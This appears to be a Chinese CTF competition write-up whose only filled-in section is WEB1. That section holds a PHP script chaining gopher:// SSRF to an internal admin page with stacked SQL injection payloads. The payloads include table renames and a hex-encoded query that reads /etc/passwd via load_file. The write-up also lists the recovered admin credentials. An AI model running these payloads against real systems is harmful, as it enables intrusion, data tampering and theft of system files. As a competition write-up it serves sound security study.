前言
第十八,企业组第一,高校组太卷了。

但讲道理,题目质量,真的不咋地。
还有一个 Web 题 Internal System 会在复现环境搭完后写。
WEB1
操作内容:
https://blog.werner.wiki/php-md5-true-sqli/
<?php
//$payload = "username=admin'/**/or/**/1=2;PREPARE jwt from 0x73656c656374202a2066726f6d207265616c5f61646d696e5f686572655f646f5f796f755f66696e643b;EXECUTE jwt;##&password=129581926211651571912466741651878684928";
//$payload = "username=admin'/**/or/**/1=2;RENAME TABLE `fake_admin` TO `fake_admin1`;RENAME TABLE `real_admin_here_do_you_find` TO `fake_admin`;##&password=129581926211651571912466741651878684928";
//$payload = "username=admin'/**/or/**/1=1;RENAME TABLE `fake_admin` TO `fake_admin1`;RENAME TABLE `user2` TO `fake_admin`;##&password=129581926211651571912466741651878684928";
//$payload = "username=admin'/**/or/**/1=1;use ctf;show tables;RENAME TABLE ctf.users TO ctf2.user2;RENAME TABLE ctf2.real_admin_here_do_you_find TO ctf.users;show columns from users;##&password=129581926211651571912466741651878684928";
//$payload = "username=admin'/**/or/**/1=1;show global variables;#&password=129581926211651571912466741651878684928";
//$payload = "username=admin'/**/or/**/1=1;PREPARE jwt from 0x73656c656374206c6f61645f66696c6528272f6574632f70617373776427293b;EXECUTE jwt;;#&password=129581926211651571912466741651878684928";
//$payload = "username=admin'/**/or/**/1=1;show tables;#&password=129581926211651571912466741651878684928";
//$payload = "username=admin_inner';show columns from fake_admin;show columns from real_admin_here_do_you_find;&password=5fb4e07de914cfc82afb44vbaf402203";
//$payload = "username=admin&password=5fb4e07de914cfc82afb44vbaf402203";
$payload = "username=admin'/**/or/**/1=1;show/**/tables;#&password=fake_password";
$test = "POST /admin.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
cache-control: no-cache
User-Agent: PostmanRuntime/7.6.0
Cookie: PHPSESSID=lh0aib3rhtu7eausnf46h7u9m7
Accept: */*
Host: 127.0.0.1
Content-Length: ".strlen($payload)."
Connection: close
".$payload."
";
//$payload = "username=admin_inner&password=5fb4e07de914cfc82afb44vbaf402203";
//$test = "GET /flag.php HTTP/1.1
//Content-Type: application/x-www-form-urlencoded
//X-Forwarded-For: 127.0.0.1
//cache-control: no-cache
//User-Agent: PostmanRuntime/7.6.0
//Cookie: PHPSESSID=lh0aib3rhtu7eausnf46h7u9m7
//Accept: */*
//Host: 127.0.0.1
//Connection: close
//
//";
echo("gopher://127.0.0.1:80/_".rawurlencode($test));
$curl = curl_init();
curl_setopt_array($curl, array(
CURLOPT_URL => "http://eci-2ze3piaq8eraibp8xg73.cloudeci1.ichunqiu.com/ssrf.php?way=".rawurlencode("gopher://127.0.0.1:80/_".rawurlencode($test)),
CURLOPT_RETURNTRANSFER => true,
CURLOPT_ENCODING => "",
CURLOPT_MAXREDIRS => 10,
CURLOPT_TIMEOUT => 30,
CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
CURLOPT_CUSTOMREQUEST => "GET",
CURLOPT_POSTFIELDS => "",
CURLOPT_HTTPHEADER => array(
"Cookie: PHPSESSID=lh0aib3rhtu7eausnf46h7u9m7",
"cache-control: no-cache"
),
));
$response = curl_exec($curl);
$err = curl_error($curl);
curl_close($curl);
if ($err) {
echo "cURL Error #:" . $err;
} else {
echo $response;
}
https://www.zhaoj.in/read-5873.html#0x04
$payload = "username=admin'/**/or/**/1=2;RENAME TABLE `fake_admin` TO `fake_admin1`;RENAME TABLE `real_admin_here_do_you_find` TO `fake_admin`;##&password=129581926211651571912466741651878684928";
array(1) {<br />
[0]=><br />
array(3) {<br />
["id"]=><br />
string(1) "1"<br />
["username"]=><br />
string(11) "admin_inner"<br />
["password"]=><br />
string(32) "5fb4e07de914cfc82afb44vbaf402203"<br />
}<br />
}<br />
$payload = "username=admin&password=5fb4e07de914cfc82afb44vbaf402203"; gopher://127.0.0.1:80/_POST%20%2Fadmin.php%20HTTP%2F1.1%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0AX-Forwarded-For%3A%20127.0.0.1%0Acache-control%3A%20no-cache%0APostman-Token%3A%20375ba985-8106-4d79-bafd-dff6654589b8%0AUser-Agent%3A%20PostmanRuntime%2F7.6.0%0ACookie%3A%20PHPSESSID%3Du470ueuprk7mtfhpiasfu50561%0AAccept%3A%20%2A%2F%2A%0AHost%3A%20127.0.0.1%0AContent-Length%3A%2056%0AConnection%3A%20close%0A%0Ausername%3Dadmin%26password%3D5fb4e07de914cfc82afb44vbaf402203%0A%0A%0A%0A%0A
flag值:
WEB2 签到
操作内容:
flag值:
WEB3
操作内容:
flag值:
